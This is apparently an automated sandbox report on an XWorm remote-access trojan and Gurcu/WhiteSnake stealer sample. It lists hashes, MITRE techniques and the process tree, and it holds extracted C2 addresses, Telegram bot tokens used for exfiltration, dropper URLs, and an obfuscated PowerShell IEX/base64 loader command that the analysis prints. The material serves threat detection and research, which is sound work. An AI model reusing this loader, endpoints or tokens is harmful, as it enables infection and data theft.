gurcu | 5f4886a8b8e573c2daede58c73bd4ed31bb2310902ba8c384197a8c6e9273dfe

Analysis

max time kernel
94s
max time network
96s
platform
windows10-ltsc_2021_x64
resource
win10ltsc2021-20250314-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system
submitted
29/03/2025, 11:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

initialize.exe
Size

77KB
MD5

cf10bc29fa7cf0eecbc8b588e8e4b8a9
SHA1

14ff3efa93fb23044658072ee8ec0afc368653a3
SHA256

5f4886a8b8e573c2daede58c73bd4ed31bb2310902ba8c384197a8c6e9273dfe
SHA512

6ef226b5c2582e9980bfea977ef7adf40257f5a11aeacbfda71d682e182207f9e4cb7d95d6ff6e70b13811b238c8b8bc18aa114d33dc9ff49f274c50d0061f89
SSDEEP

1536:zQMYzTYBo8kvIVGbA/pqtkeI/ObHs9TyTWlYKN6Yx6OOE01I3:kMgEu8MIVgUpsbI/ObHCmTWeKoO3gQ

Score

10^/10

gurcu xworm discovery execution rat stealer trojan

Malware Config

Extracted

Family

xworm

developed-headline.gl.at.ply.gg:12171

Attributes

Install_directory
%AppData%
install_file
svchost.exe
telegram
https://api.telegram.org/bot7233744522:AAF4C4kHsWhsji1M9XSwnhnp-8xmfNuBpLs/sendMessage?chat_id=5445326064

Extracted

Language

ps1

Source

URLs

exe.dropper

http://activetools.live/data.bat

exe.dropper

http://activetools.live/Host.vbs

Extracted

Language

ps1

Source

URLs

exe.dropper

https://github.com/Ladyhaha06/Python/archive/refs/heads/main.zip

Extracted

Family

xworm

Version

5.0

15.235.130.195:7000

Mutex

nIGrXTARcqqUL0y6

Attributes

install_file
USB.exe
telegram
https://api.telegram.org/bot7521511416:AAF9XlqNWPqzl6LkH7jQe-YyUvkLv_AVsQw

aes.plain

Extracted

Family

gurcu

https://api.telegram.org/bot7521511416:AAF9XlqNWPqzl6LkH7jQe-YyUvkLv_AVsQw/sendMessage?chat_id=-4799055577

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/memory/2832-1-0x0000000000230000-0x000000000024A000-memory.dmp	family_xworm
behavioral1/memory/3168-937-0x0000000004C20000-0x0000000004C30000-memory.dmp	family_xworm

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 5 IoCs

flow	pid	Process
174	2064	powershell.exe
176	3164	powershell.exe
177	2064	powershell.exe
179	5932	powershell.exe
181	5932	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1660	powershell.exe
3164	powershell.exe
5932	powershell.exe
5252	powershell.exe
460	powershell.exe
2356	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Startup.lnk	powershell.exe

Loads dropped DLL 2 IoCs

pid	Process
1660	powershell.exe
1660	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ping.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3168	ping.exe

Checks processor information in registry 2 TTPs 20 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings	powershell.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3168	ping.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
2064	powershell.exe
2064	powershell.exe
2064	powershell.exe
2356	powershell.exe
2356	powershell.exe
2356	powershell.exe
3164	powershell.exe
3164	powershell.exe
3164	powershell.exe
5252	powershell.exe
5252	powershell.exe
5252	powershell.exe
1660	powershell.exe
1660	powershell.exe
1660	powershell.exe
5932	powershell.exe
5932	powershell.exe
5932	powershell.exe
460	powershell.exe
460	powershell.exe
460	powershell.exe
3168	ping.exe
3168	ping.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeDebugPrivilege	2832	initialize.exe
Token: SeDebugPrivilege	2064	powershell.exe
Token: SeDebugPrivilege	3316	firefox.exe
Token: SeDebugPrivilege	3316	firefox.exe
Token: SeDebugPrivilege	2356	powershell.exe
Token: SeDebugPrivilege	3164	powershell.exe
Token: SeDebugPrivilege	5252	powershell.exe
Token: SeDebugPrivilege	1660	powershell.exe
Token: SeDebugPrivilege	5932	powershell.exe
Token: SeDebugPrivilege	460	powershell.exe
Token: SeDebugPrivilege	3168	ping.exe

Suspicious use of FindShellTrayWindow 18 IoCs

pid	Process
3316	firefox.exe
3316	firefox.exe
3316	firefox.exe
3316	firefox.exe
3316	firefox.exe
3316	firefox.exe
3316	firefox.exe
3316	firefox.exe
3316	firefox.exe
3316	firefox.exe
3316	firefox.exe
3316	firefox.exe
3316	firefox.exe
3316	firefox.exe
3316	firefox.exe
3316	firefox.exe
3316	firefox.exe
3316	firefox.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
3316	firefox.exe
3316	firefox.exe
3316	firefox.exe
3316	firefox.exe
3316	firefox.exe
3316	firefox.exe
3316	firefox.exe
3316	firefox.exe
3316	firefox.exe
3316	firefox.exe
3316	firefox.exe
3316	firefox.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3316	firefox.exe
3168	ping.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 460 wrote to memory of 3316	460	firefox.exe	106
PID 460 wrote to memory of 3316	460	firefox.exe	106
PID 460 wrote to memory of 3316	460	firefox.exe	106
PID 460 wrote to memory of 3316	460	firefox.exe	106
PID 460 wrote to memory of 3316	460	firefox.exe	106
PID 460 wrote to memory of 3316	460	firefox.exe	106
PID 460 wrote to memory of 3316	460	firefox.exe	106
PID 460 wrote to memory of 3316	460	firefox.exe	106
PID 460 wrote to memory of 3316	460	firefox.exe	106
PID 460 wrote to memory of 3316	460	firefox.exe	106
PID 460 wrote to memory of 3316	460	firefox.exe	106
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 4640	3316	firefox.exe	107
PID 3316 wrote to memory of 5580	3316	firefox.exe	108
PID 3316 wrote to memory of 5580	3316	firefox.exe	108
PID 3316 wrote to memory of 5580	3316	firefox.exe	108
PID 3316 wrote to memory of 5580	3316	firefox.exe	108
PID 3316 wrote to memory of 5580	3316	firefox.exe	108
PID 3316 wrote to memory of 5580	3316	firefox.exe	108
PID 3316 wrote to memory of 5580	3316	firefox.exe	108
PID 3316 wrote to memory of 5580	3316	firefox.exe	108

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\initialize.exe
"C:\Users\Admin\AppData\Local\Temp\initialize.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2064
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c start /min powershell -ArgumentList "-WindowStyle Hidden -ExecutionPolicy Bypass -Command"
  2⤵
  PID:748
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ArgumentList "-WindowStyle Hidden -ExecutionPolicy Bypass -Command"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2356
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\rhw.ps1"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops startup file
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3164
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start /min powershell -ArgumentList "-WindowStyle Hidden -ExecutionPolicy Bypass -Command"
    3⤵
    PID:460
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ArgumentList "-WindowStyle Hidden -ExecutionPolicy Bypass -Command"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5252
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Startup.vbs"
    3⤵
    - Checks computer location settings
    PID:1432
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\data.bat"
      4⤵
      PID:1176
    - - C:\Windows\system32\cmd.exe
        
        CMd.eXe /C sTArt /miN pOWErShelL.exe -W h -C "IEX([sYsTem.texT.EnCodIng]::uTf8.gEtstrinG([SystEm.CoNVErt]::frOmbAsE64StrinG(($vZBjhxKpNNz=[sySteM.io.fIle]::reaDAlLtEXt('C:\Users\Admin\AppData\Local\data.bat')).SUbsTrIng($vZBjhxKpNNz.LenGTh - 341392))))"
        5⤵
        
        PID:4972
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        pOWErShelL.exe -W h -C "IEX([sYsTem.texT.EnCodIng]::uTf8.gEtstrinG([SystEm.CoNVErt]::frOmbAsE64StrinG(($vZBjhxKpNNz=[sySteM.io.fIle]::reaDAlLtEXt('C:\Users\Admin\AppData\Local\data.bat')).SUbsTrIng($vZBjhxKpNNz.LenGTh - 341392))))"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1660
        
        C:\Windows\Syswow64\ping.exe
        
        "C:\Windows\Syswow64\ping.exe" -t 127.0.0.1
        7⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:3168
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\pyhw.ps1"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5932
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start /min powershell -ArgumentList "-WindowStyle Hidden -ExecutionPolicy Bypass -Command"
    3⤵
    PID:1108
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ArgumentList "-WindowStyle Hidden -ExecutionPolicy Bypass -Command"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:460

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:460
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3316
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2008 -prefsLen 27100 -prefMapHandle 2012 -prefMapSize 270279 -ipcHandle 2088 -initialChannelId {90bbba70-18cd-483d-b493-1a33c19d9be4} -parentPid 3316 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3316" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
    3⤵
    PID:4640
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2464 -prefsLen 27136 -prefMapHandle 2468 -prefMapSize 270279 -ipcHandle 2476 -initialChannelId {98acd942-4cb2-4775-b3cb-8bde96933ad0} -parentPid 3316 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3316" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
    3⤵
    PID:5580
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3936 -prefsLen 27277 -prefMapHandle 3940 -prefMapSize 270279 -jsInitHandle 3944 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3952 -initialChannelId {33eacd3b-c922-4776-902a-433b40d58cbf} -parentPid 3316 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3316" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
    3⤵
    - Checks processor information in registry
    PID:4604
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4104 -prefsLen 27277 -prefMapHandle 4108 -prefMapSize 270279 -ipcHandle 4200 -initialChannelId {6c780040-eb76-4ac4-bfe0-d4c7cdf15070} -parentPid 3316 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3316" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
    3⤵
    PID:1116
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2644 -prefsLen 34776 -prefMapHandle 2860 -prefMapSize 270279 -jsInitHandle 2728 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 1660 -initialChannelId {3189127e-b9dc-4589-9bf5-ed29bfe64f29} -parentPid 3316 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3316" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
    3⤵
    - Checks processor information in registry
    PID:2640
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4992 -prefsLen 34825 -prefMapHandle 4996 -prefMapSize 270279 -ipcHandle 5004 -initialChannelId {071eeecc-303f-4a4f-978f-c135a963d8c8} -parentPid 3316 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3316" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
    3⤵
    - Checks processor information in registry
    PID:2040
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5332 -prefsLen 32952 -prefMapHandle 5336 -prefMapSize 270279 -jsInitHandle 5340 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5348 -initialChannelId {80fce1d2-f3a8-467a-bb29-4a6aa481c85a} -parentPid 3316 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3316" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
    3⤵
    - Checks processor information in registry
    PID:4800
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5556 -prefsLen 32952 -prefMapHandle 5560 -prefMapSize 270279 -jsInitHandle 5564 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5572 -initialChannelId {bf5fbba2-41c1-4fa4-9e70-4eae72e512bd} -parentPid 3316 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3316" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
    3⤵
    - Checks processor information in registry
    PID:3668
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5760 -prefsLen 32952 -prefMapHandle 5764 -prefMapSize 270279 -jsInitHandle 5768 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5776 -initialChannelId {f078d132-e932-4d07-abf7-61b9c0bcab2d} -parentPid 3316 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3316" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
    3⤵
    - Checks processor information in registry
    PID:4920
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6380 -prefsLen 33071 -prefMapHandle 6448 -prefMapSize 270279 -jsInitHandle 6356 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6488 -initialChannelId {27d47398-7f8f-4b7c-ba5e-7cc6468a93df} -parentPid 3316 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3316" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 10 tab
    3⤵
    - Checks processor information in registry
    PID:1612

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
e30544e6d048b2c1c6129c89835c16dd

SHA1
21d167ff64825d3f8a5c351c3160b670dc14cb60

SHA256
df0fcfba7ccb03bac0ccf6941f9cc512937fdc63035a2fedc78aa9a82c1d8af1

SHA512
fcfc1e2b4110286dc8ede8caab34ea309e24fa6deb225213ab0e5b2d6499cc195e65dde2e125bca3ef5d5b5f4fdda66a1e4429cf2ea1c3df0ba92142342dfd9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
54KB

MD5
7b7f314ffd8ffe6868c436395d06a6dc

SHA1
5757be158548e9138e109569c877b97ce82b7385

SHA256
1a0ff6ec5962f40274ba9b41cce2f8d2a6b101a9db4713ffa57272c1b6228fbc

SHA512
742b4637f8cc223e4c8270cab81df4b11666d87ab3371d1fadac5e4ae8d9864a23e1c0e789f32e8aaa347540d250f947f8ace0f0f2d133757766856f0053eaab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
c305829554256aac05ae89f3cb600d3a

SHA1
047f739a17634c61d5df24ddac3eeb03444a66b9

SHA256
acd53a19218ea61acffc37318478a60fa4efa8c93cdd93b6f2f149b26e7ba9cf

SHA512
14e7df0f5e9ea0dcd536b1efc5babf5305d025f958fa7b11ea89c1317e0cf671c3fed950f8378eb85479026376ed10ef62cef28aad081404a41aecb093be7c68

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2a3799af11bd03167b218f5718e4cc55

SHA1
361d513b70ddbebd6165dc20a07656be3294da28

SHA256
1b0de9d15faec9f1521e6c4c863de6d7c8ee11ddf86a76ce8c58e8f316c88113

SHA512
b2fd1ed2bbe70967a6457dda16c0ddd7056e5481d8f82991bbd6ef278491f126a942ce4790661387637b0361cf4eb2d37ebf169b8baa7ee0b801168b6638a7c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
12b6c155f377c7255475768928351b16

SHA1
03d17979b88f22993461ac339956f777e80edf85

SHA256
777230839d51f1e1fd9f9a3162b969448847d379daaa9d45a8a33c90a51c998e

SHA512
b1ffd9df60b4b8b9c4e2e7bfa66a937e9577329bf5d2889566d5f892045a308f7adfb62a404bcdff96846c731e4b23f657577d6dd8ce5e3a566d0ae5026b9983

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ptqf56iz.default-release\activity-stream.discovery_stream.json.tmp

Filesize
22KB

MD5
3c640b7d4dba97402889d2262d54b462

SHA1
211d86f1a0d25c040c2869d4bf58281f7c40e31e

SHA256
5c66460522f14ef8fef53c5de634859a0af1b6d9d04d32a18c86f3bcfb26f93c

SHA512
a44297d6b747727d7e261fc31fb35a512e220fb8bf0e82352f6c9d0742247ebbdf8bc9d01385e0e77d73722b736a4c728d253bf27c07982f1f0a646abae42748

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ptqf56iz.default-release\cache2\entries\A585344A45AF937E3AB7D706291A9A3ED8D581D9

Filesize
13KB

MD5
a0655199533a16e5ee5d40cdbf8a3974

SHA1
0a1c7565afe7b79ad83d09cfedd8a5e678e91318

SHA256
cf7cc99fafbd5d67cc7f8644545ddd0485da4f4964771f40474d61b2ceb196be

SHA512
5e914b8d86dede6852c5b173db77c666fd3d28aac24cd0c9452a8385e313826239913451da52c21c26a9aadc4192a3f5c2232cec831d8dd4964102abcffe3200

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_om1yd4ef.v01.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
11KB

MD5
25e8156b7f7ca8dad999ee2b93a32b71

SHA1
db587e9e9559b433cee57435cb97a83963659430

SHA256
ddf3ba4e25a622276755133e0cce5605b83719c7cab3546e09acbfed00d6a986

SHA512
1211b2fa997ba13ff926aec58b6b35a81d7fe108b0caa8f4d6369d0a37f8481373b78a4b201651243adde9e2b2699ce929482a46226ff6299b0a0e40fe2ddc56

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
14.0MB

MD5
bcceccab13375513a6e8ab48e7b63496

SHA1
63d8a68cf562424d3fc3be1297d83f8247e24142

SHA256
a6af95a209b2e652ed6766804b9b8ad6b6a68f2c610b8f14713cd40df0d62bf9

SHA512
d94483deaae98bf9212699f1ab0bd913f6151a63e65ebc1ea644ab98d5e3ebd74ecaa08f70aca31e11a5d2c64d1504b723817af35bbe9d7b05c758dd6945d484

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
502KB

MD5
e690f995973164fe425f76589b1be2d9

SHA1
e947c4dad203aab37a003194dddc7980c74fa712

SHA256
87862f4bc8559fbe578389a9501dc01c4c585edb4bb03b238493327296d60171

SHA512
77991110c1d195616e936d27151d02e4d957be6c20a4f3b3511567868b5ddffc6abbfdc668d17672f5d681f12b20237c7905f9b0daaa6d71dcdac4b38f2448b2

Download Submit
C:\Users\Admin\AppData\Local\data.bat

Filesize
337KB

MD5
dc95a623a76a563ebbdf2b2eae36bd1b

SHA1
aae6eba3a2f88a54291af251a21029d04e88094b

SHA256
